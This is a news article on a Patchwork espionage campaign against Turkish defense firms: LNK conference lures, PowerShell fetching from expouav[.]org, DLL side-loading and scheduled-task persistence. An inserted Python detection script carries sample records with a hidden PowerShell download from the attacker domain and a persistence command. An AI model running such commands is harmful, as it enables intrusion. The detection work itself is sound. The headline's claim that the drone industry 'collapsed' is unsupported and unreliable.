NEWS One Email — and Turkey’s Billion-Dollar Drone Empire Collapsed in 30 Seconds

ExcalibuR


How Patchwork hackers looted the defense sector through a fake conference


The hacking group Patchwork — also known by aliases such as APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson — has launched a new targeted phishing campaign aimed at Turkey’s defense sector. According to analysts, the attackers were seeking sensitive information related to the development of drone platforms and hypersonic weapons.


According to Arctic Wolf Labs, the malicious attack chain consists of five stages and begins with the distribution of Windows LNK shortcut files, disguised as invitations to an international UAV technology conference. These phishing emails were sent to employees at Turkish defense contractors, including a manufacturer of high-precision missile systems.


The geopolitical backdrop makes this attack particularly significant: it coincides with intensified military-technical cooperation between Turkey and Pakistan, and rising tensions between Pakistan and India. Analysts believe that Patchwork operates in the interests of the Indian state and has systematically targeted political and military entities in South Asia since 2009.


Earlier in 2025, the same group conducted a campaign against Chinese universities, using energy-related documents as lures. That campaign employed a Rust-based loader that decrypted and executed a C# Trojan named Protego, which was designed to harvest data from infected machines.


The current attack on Turkish defense firms once again employs LNK files embedding PowerShell commands. These scripts establish a connection to a remote server — expouav[.]org, a domain registered on June 25, 2025, used to deliver the malicious payload. In addition to malware, the site contains a PDF file mimicking conference materials, referencing a legitimate event hosted on the WASET platform. This convincingly distracts the user while the malicious code executes in the background.


Subsequent steps lead to the download of a malicious DLL that is executed via DLL side-loading, in which a trusted application is made to load the attacker's DLL in place of the legitimate one it expects. Execution is initiated via a scheduled Windows task, which launches embedded shellcode. This module performs reconnaissance, collecting system data, taking screenshots, and sending the information back to a C2 server.
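As an added example, not code from the original post or from Arctic Wolf's research: a small Python triage script that maps process-creation records onto the stages of the chain described above (LNK-launched PowerShell reaching expouav[.]org, a side-load host started from a user-writable folder, a scheduled task pointing into that folder). The key="value" record format, the user-writable path list and the sample records are assumptions constructed for the example.

```python
import re

# Domain quoted in the article, defanged there; matching uses the live form.
KNOWN_C2 = "expouav[.]org".replace("[.]", ".")
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.I)
DOWNLOAD_PRIMITIVE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadfile|downloadstring)\b"
    r"|-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s", re.I)

def parse_event(line: str) -> dict:
    """Parse one constructed key="value" process-creation record."""
    f = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return {"parent": f.get("ParentImage", "").lower(),
            "image": f.get("Image", "").lower(),
            "cmd": f.get("CommandLine", "")}

def classify(ev: dict) -> list[str]:
    """Map one event onto the stages the article describes; [] if none match."""
    hits, cmd_l = [], ev["cmd"].lower()
    if ev["image"].endswith("powershell.exe"):
        if KNOWN_C2 in cmd_l:
            hits.append("stage1-powershell-known-c2")
        # explorer.exe as parent is what a double-clicked LNK looks like in logs
        if ev["parent"].endswith("explorer.exe") and DOWNLOAD_PRIMITIVE.search(cmd_l):
            hits.append("stage1-lnk-powershell-download")
    # A program started from a user-writable folder is the kind of host a
    # side-loaded DLL sits beside; confirming the load needs an ImageLoad record.
    elif USER_WRITABLE.search(ev["image"]):
        hits.append("stage2-sideload-host-in-user-path")
    if (ev["image"].endswith("schtasks.exe") and "/create" in cmd_l
            and USER_WRITABLE.search(cmd_l)):
        hits.append("stage3-scheduled-task-user-path")
    return hits

def scan(lines: list[str]) -> list[tuple[str, str]]:
    """Return (stage, process name) pairs for every record that trips a rule."""
    out = []
    for ev in map(parse_event, lines):
        out += [(tag, ev["image"].rsplit("\\", 1)[-1]) for tag in classify(ev)]
    return out

# Constructed sample records modelled on the chain in the article, not real logs.
SAMPLE_LOG = [
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -w hidden -c iwr https://expouav.org/conf.pdf -OutFile $env:TEMP\conf.pdf"',
    r'ParentImage="C:\Windows\System32\svchost.exe" Image="C:\Users\ana\AppData\Roaming\UavConf\viewer.exe" CommandLine="viewer.exe"',
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\schtasks.exe" CommandLine="schtasks /create /tn Updater /tr C:\Users\ana\AppData\Roaming\UavConf\viewer.exe /sc minute /mo 5"',
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Program Files\Vendor\app.exe" CommandLine="app.exe --normal"',
]
```

Calling `scan(SAMPLE_LOG)` flags the first three records and leaves the ordinary program alone; the stage-2 rule is a triage signal only, since legitimate installers also live under AppData.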


A notable feature of this operation is the use of 32-bit PE files, in contrast to the previously used 64-bit DLLs. This shift reflects a technical evolution aimed at better stealth: compact x86 binaries are easier to embed in trusted processes, and the change in architecture complicates automated detection.


Researchers also noted infrastructure overlaps with the DoNot Team (APT-Q-38, Bellyworm), suggesting possible tactical or logistical cooperation between the two India-linked APT clusters.


The campaign targeting Turkey’s defense industry marks an expansion of Patchwork’s focus beyond South Asia. Given Turkey’s dominant role in the global drone export market (accounting for roughly 65% of global UAV exports) and its ambitions in hypersonic weapons, the activity of this Indian cyber-espionage group appears to be strategically motivated.